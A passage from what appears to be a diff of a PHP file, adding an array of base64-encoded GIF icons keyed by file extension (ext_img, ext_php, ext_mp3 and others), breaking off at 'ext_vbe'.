+"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
+"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
+"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
+"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
+"ADs=",
+"ext_img"=>
+"R0lGODlhEwAQALMAAAAAAP///6CgpHFzcVe2Osz/mbPmZkRmAPj4+Nra2szMzLKyspeXl4aGhlVV".
+"Vf///yH5BAEAAA8ALAAAAAATABAAAASA8KFJq00vozZ6Z4uSjGOTSV3DMFzTCGJ5boIQKsrqgoqp".
+"qbabYsFq+SSs1WLJFLgGx82OUWMuXVEPdGcLOmcehziVtEXFjoHiQGCnV99fR4EgFA6DBVQ3c3bq".
+"BIEBAXtRSwIsCwYGgwEJAywzOCGHOliRGjiam5M4RwlYoaJPGREAOw==",
+"ext_inf"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
+"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
+"SnEjgPVarHEHgrB43JvszsQEADs=",
+"ext_ini"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
+"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
+"SnEjgPVarHEHgrB43JvszsQEADs=",
+"ext_isp"=>
+"R0lGODlhEAAQADMAACH5BAEAAAwALAAAAAAQABAAgwAAAICAAP8A/wCAgAD/////AP///8DAwICA".
+"gIAAgACAAAD/AAAAAAAAAAAAAAAAAARakMl5xjghzC0HEcIAFBrHeALxiSQ3LIJhEIkwltOQxiEC".
+"YC6EKpUQBQCc1Oej8B05R4XqYMsgN4ECwGJ8mrJHgNU0yViv5DI6LTGvv1lSmBwwyM1eDmDP328i".
+"ADs=",
+"ext_ist"=>
+"R0lGODlhEAAQAEQAACH5BAEAABIALAAAAAAQABAAhAAzmQBmzAAAAABmmQCZzACZ/wAzzGaZzDOZ".
+"/5n//wBm/2bM/zPM/zOZzMz//zNmzJnM/zNmmQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAV1oASMZDlKqDisQRscQYIAKRAFw3scTSPPKMDh4cI9dqRgi0BY4gINoIhQ".
+"QBQUhSZOSBMxIIkEo5BlrrqAhWO9KLgIg5NokYCMiwGDHICwKt5NemhkeEV7ZE1MLQYtcUF/RQaS".
+"AGdKLox5I5Uil5iUZ2gmoichADs=",
+"ext_jfif"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+"FxEAOw==",
+"ext_jpe"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+"FxEAOw==",
+"ext_jpeg"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+"FxEAOw==",
+"ext_jpg"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+"FxEAOw==",
+"ext_js"=>
+"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
+"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
+"a00AjYYBbc/o9HjNniUAADs=",
+"ext_lnk"=>
+"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO".
+"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi".
+"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk".
+"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG".
+"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5".
+"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf".
+"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".
+"ADs=",
+"ext_log"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
+"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
+"ext_m1v"=>
+"R0lGODlhEAAQADMAACH5BAEAAAwALAAAAAAQABAAgwAAAICAgMDAwP///4AAAICAAACAAP//AP8A".
+"AAAA/wCAgAD//wAAAAAAAAAAAAAAAARlkEkZapiY2iDEzUwwjMmSjN8kCoAXKEmXhsLADUJSFDYW".
+"AKOa7bDzqG42UYFopHRqLMHOUDmungbDQTH74ToDQ0Fr8Ak5guy4QPCNWizCATFvq2xxBB1h91UJ".
+"BHx9IBOAg4SIDBEAOw==",
+"ext_m3u"=>
+"R0lGODlhEAAQAEQAACH5BAEAABUALAAAAAAQABAAhAAAAPLy8v+qAHNKAD4+Prl6ADIyMubm5v+4".
+"SLa2tm5ubsDAwJ6ennp6ev/Ga1AyAP+Pa/+qJWJiYoCAgHMlAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAVzYCWOlQSQAEWORMCcABENa9UG7lNExUnegcQAIeitgIoC0fjDNQYCokBh".
+"8NmCUIdDKhi8roGGYMztugCARXgwcIzHg0TgYKikg9yCAkcfASZccXx1fhBjejhzhCIAhlNygytQ".
+"PXeKNQMPPml9NVaMBDUVIQA7",
+"ext_mdb"=>
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
+"/////ywAAAAAEAAQAAAEV/BIRKuV+KDHO0eAFBRjSRbfE6JeFxwqIAcdQm4FzB0A+5AP2qvDo3FM".
+"P92DxzJtXpIlQHjr5KLMX2Dj2kmNrZ+XaSqPQ5NdBovWhD08DGJNb4Nk+LwsAgA7",
+"ext_mid"=>
+"R0lGODlhEAAQACIAACH5BAEAAAQALAAAAAAQABAAggAAAP///4CAgMDAwAAAAAAAAAAAAAAAAANE".
+"SCTcrnCFSecQUVY6AoYCBQDiCIDlyJ1KOJGqxWoBWa/oq8t5bAeDWci0Awprtpgx91IGmcjKs7XZ".
+"TBeDrHZ7NXm/pwQAOw==",
+"ext_midi"=>
+"R0lGODlhEAAQACIAACH5BAEAAAQALAAAAAAQABAAggAAAP///4CAgMDAwAAAAAAAAAAAAAAAAANE".
+"SCTcrnCFSecQUVY6AoYCBQDiCIDlyJ1KOJGqxWoBWa/oq8t5bAeDWci0Awprtpgx91IGmcjKs7XZ".
+"TBeDrHZ7NXm/pwQAOw==",
+"ext_mov"=>
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
+"/////ywAAAAAEAAQAAAEU/DIg6q1M6PH+6OZtHnc8SDhSAIsoJHeAQiTCsuCoOR8zlU4lmIIGApm".
+"CBdL1hruirLoQec0so5SQYKomAEeSxezRe5IRTCzGJ3+rEGhzJtMb0UAADs=",
+"ext_mp3"=>
+"R0lGODdhEAAQAPcAAAAAACMjIyAgIEpKSgQNGxIWHzMzM////0dISQIMHCwoHNqbMHNMAPj9/1RP".
+"YZdfAP/NVP+5ADEqH1xpgjcZAP+6D//Mb/+vAB0YDgYLEzg4OJGcrzMUAOOWAP+9AP/AVf+qADs5".
+"N0pOVh4eHhUVGLJyAP/AA/+vDP+1HP+0AOihABUMAGJqevWqEf/BMv+zLP/cqv+1APWPAPePAKha".
+"ALjAy2NsfvqkAP+xAP/QefWsAPRtAP+eAP/OAE0YANTY4Tk5OQAABNC3e/qQAPZuAP/IAOeaAAwG".
+"AL7F0QAADt61Xv9xAP+gAP/FAGU2AElXdAseMemaXfeJAP/KANeGAAkJCdXc6R0mMNePS/++AEUo".
+"AImXrQgVLP/YALh9ACQmKxUcJkJCQiMmLGVJERgjOBMTEwsOFQAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAEAAQAAAIuwCRCByI".
+"JEAAgggJChgwQIBAAgUSIhFg4MABBAkULGCQkKLFBg4eQIggAaHHAxMoVLBwAYNJDQc2cOjg4QOI".
+"ECJGDBQAk0QJEydQpFCx4oAGhwEGHGDRwsULGDFkzKBR48AAg0pt3MCRQ8cOHj18/LB6UACQA0GE".
+"DCFSxMgRJAcMOBQoIImSJUyaOHliUS5BKFGkTKFSxUrfuQKvYImQRcsWi3ERC+TSxcsXMGEOJxQz".
+"hgxdhpIlCjQoMSAAOw==",
+"ext_mp4"=>
+"R0lGODdhEAAQAPcAAAAAACMjIyAgIEpKSgQNGxIWHzMzM////0dISQIMHCwoHNqbMHNMAPj9/1RP".
+"YZdfAP/NVP+5ADEqH1xpgjcZAP+6D//Mb/+vAB0YDgYLEzg4OJGcrzMUAOOWAP+9AP/AVf+qADs5".
+"N0pOVh4eHhUVGLJyAP/AA/+vDP+1HP+0AOihABUMAGJqevWqEf/BMv+zLP/cqv+1APWPAPePAKha".
+"ALjAy2NsfvqkAP+xAP/QefWsAPRtAP+eAP/OAE0YANTY4Tk5OQAABNC3e/qQAPZuAP/IAOeaAAwG".
+"AL7F0QAADt61Xv9xAP+gAP/FAGU2AElXdAseMemaXfeJAP/KANeGAAkJCdXc6R0mMNePS/++AEUo".
+"AImXrQgVLP/YALh9ACQmKxUcJkJCQiMmLGVJERgjOBMTEwsOFQAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAEAAQAAAIuwCRCByI".
+"JEAAgggJChgwQIBAAgUSIhFg4MABBAkULGCQkKLFBg4eQIggAaHHAxMoVLBwAYNJDQc2cOjg4QOI".
+"ECJGDBQAk0QJEydQpFCx4oAGhwEGHGDRwsULGDFkzKBR48AAg0pt3MCRQ8cOHj18/LB6UACQA0GE".
+"DCFSxMgRJAcMOBQoIImSJUyaOHliUS5BKFGkTKFSxUrfuQKvYImQRcsWi3ERC+TSxcsXMGEOJxQz".
+"hgxdhpIlCjQoMSAAOw==",
+"ext_mpe"=>
+"R0lGODlhEAAQADMAACH5BAEAAAsALAAAAAAQABAAgwAAAP///4CAgMDAwACAgICAAACAAP8AAP//".
+"AIAAAAD//wAAAAAAAAAAAAAAAAAAAARqcMlBKxUyz8B7EJi2DF4nfCIJgiTgAtl6BoNAUvBik0RP".
+"2zTYSQDgKQif00Co4ggKhRMgqKM4AwWE1MacTaFRAFdCpHEMBARBvCQ7SYY4cewmDtCFg4uo2REP".
+"Bwh6fBovAAkHCYYihS4iEQA7",
+"ext_mpeg"=>
+"R0lGODlhEAAQADMAACH5BAEAAAsALAAAAAAQABAAgwAAAP///4CAgMDAwACAgICAAACAAP8AAP//".
+"AIAAAAD//wAAAAAAAAAAAAAAAAAAAARqcMlBKxUyz8B7EJi2DF4nfCIJgiTgAtl6BoNAUvBik0RP".
+"2zTYSQDgKQif00Co4ggKhRMgqKM4AwWE1MacTaFRAFdCpHEMBARBvCQ7SYY4cewmDtCFg4uo2REP".
+"Bwh6fBovAAkHCYYihS4iEQA7",
+"ext_mpg"=>
+"R0lGODlhEAAQADMAACH5BAEAAAsALAAAAAAQABAAgwAAAP///4CAgMDAwACAgICAAACAAP8AAP//".
+"AIAAAAD//wAAAAAAAAAAAAAAAAAAAARqcMlBKxUyz8B7EJi2DF4nfCIJgiTgAtl6BoNAUvBik0RP".
+"2zTYSQDgKQif00Co4ggKhRMgqKM4AwWE1MacTaFRAFdCpHEMBARBvCQ7SYY4cewmDtCFg4uo2REP".
+"Bwh6fBovAAkHCYYihS4iEQA7",
+"ext_nfo"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs".
+"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv".
+"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3".
+"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr".
+"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX".
+"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA".
+"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW".
+"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK".
+"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm".
+"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg".
+"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF".
+"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA".
+"Ow==",
+"ext_ocx"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAIAAAP8AAP//AAAA/wD/AACAAAAAgICA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARKMMlJq704620AQlMQAABlFMAwlIEgEESZnKg6tEJwwOVZ".
+"IjfXKLHryRK4oaRDJByQwlQP1SQkUypAgdpsDYErruRAOpaPm7Q6HQEAOw==",
+"ext_pcx"=>
+"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA".
+"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q".
+"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3".
+"EzWCgwARADs=",
+"ext_php"=>
+"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg".
+"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==",
+"ext_pif"=>
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
+"/////ywAAAAAEAAQAAAEO/DISasEOGuNDkJMeDDjGH7HpmYd9jwazKUybG+tvOlA7gK1mYv3w7RW".
+"mJRRiRQ2Z5+odNqxWK/YrDUCADs=",
+"ext_pl"=>
+"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
+"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
+"ext_png"=>
+"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA".
+"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q".
+"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3".
+"EzWCgwARADs=",
+"ext_reg"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgACAgMDAwAD//wAAAAAAAANM".
+"aCrcrtCIQCslIkprScjQxFFACYQO053SMASFC6xSEQCvvAr2gMuzCgEwiZlwwQtRlkPuej2nkAh7".
+"GZPK43E0DI1oC4J4TO4qtOhSAgA7",
+"ext_rev"=>
+"R0lGODlhEAAQAFUAACH5BAEAAD8ALAAAAAAQABAAhQAAAOvz+////1gdAFAAANDY4IYCU/9aZJIC".
+"Wtvi7PmyheLq8xE2AAAyUNTc5DIyMr7H09jf5/L5/+Dg8PX6/4SHl/D4/5OXpKGmse/2/ZicqPb6".
+"/28aIBlOAMHI0MzU3MXFHjJQAOfu9d7k7gA4Xv//sRVDAI0GUY0CU+Hn8ABbjfFwOABMfwhfL/99".
+"0v+H1+hatf9syvRjwP+V3gA4boCAAABQhf+j5f++8P950FBQAN/n8PD2/HNzAABilgAAAAaRwIFw".
+"SCz+MJpLhdMzOJ9PAqRQmJxKuNvs5crFZDBCwSIQcECItDqNIlAkGcejRqjb74C8fs8/JiskLD4e".
+"BRERCSMpIg1TVTYqAZGRPBsCCw1jZTSVZZ0CAZdvcQ+SBwqfn5d8pacBqX5KJgEHtAcrrTsMjRM6".
+"rKgLBQyZAiG+rh8tDKJyCc3OEQUdHQx81Xs/QQA7",
+"ext_rmi"=>
+"R0lGODlhFAAUAKL/AAAAAH8Af//4/8DAwL+/v39/fwAAAAAAACH5BAEAAAMALAAAAAAUABQAQANS".
+"OLrcvkXIMKUg4BXCu8eaJV5C8QxRQAmqBTpFLM+nEk3qemUwXkmvxs3n4tWOyCRk5DKdhi0JYGpk".
+"QFm6oNWyylaXud8uxI2Oe8zig8puf5WNBAA7",
+"ext_rtf"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
+"ext_shtm"=>
+"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAIdjI+pq+DAEIzpTXputLi9rmGc".
+"ETbgR3aZmrIlVgAAOw==",
+"ext_shtml"=>
+"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAIdjI+pq+DAEIzpTXputLi9rmGc".
+"ETbgR3aZmrIlVgAAOw==",
+"ext_so"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
+"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
+"AAA7",
+"ext_stl"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAP///wCAAMDAwAAAgP//AICAgICAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARYEIlJK0VYmDE294YAZEMQFCZ6DiJpBsNRmuwoDephHGqd".
+"GanYLBCyCYavYOsWIDQJUKePeXr1lprmM1ooklRJGrbkjEJhY7B6qvlwOh+sZb5EAO74PB4RAQA7",
+"ext_swf"=>
+"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
+"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
+"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
+"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
+"ext_sys"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAgv///wAAAICAgMDAwICAAP//AAAAAAAAAANJ".
+"aLLc9lCASecQ8MlKB8ARRwVkEIqdqU0EEXCDqkxB4VZxSBTB8lqyTSD2+eVWE0lP8DrORgMiwLkZ".
+"/aZBVOqkpUa/4KisRC6rEgA7",
+"ext_tar"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
+"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
+"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
+"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
+"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
+"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
+"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
+"u4tLAgEAOw==",
+"ext_theme"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAAD/AAAA/wCAAAAA".
+"gAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+"FxEAOw==",
+"ext_txt"=>
+"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
+"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
+"UpPWG3Ig6Hq/XmRjuZwkAAA7",
+"ext_url"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg4CAgAAAAMDAwP///wAA/wAAgACAAAD/AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARdEMk5gQU0IyuOMUV1XYf3ESEgrCwQnGgQAENdjwCBFjO7".
+"Xj9AaYbjFArBme1mKeiQLpWvqdMJosXB1akKbGxSzvXqVXEGNKDAuyGq0NqriyJTW2QaRP3Ozktk".
+"fRQRADs=",
+"ext_vbe"=>
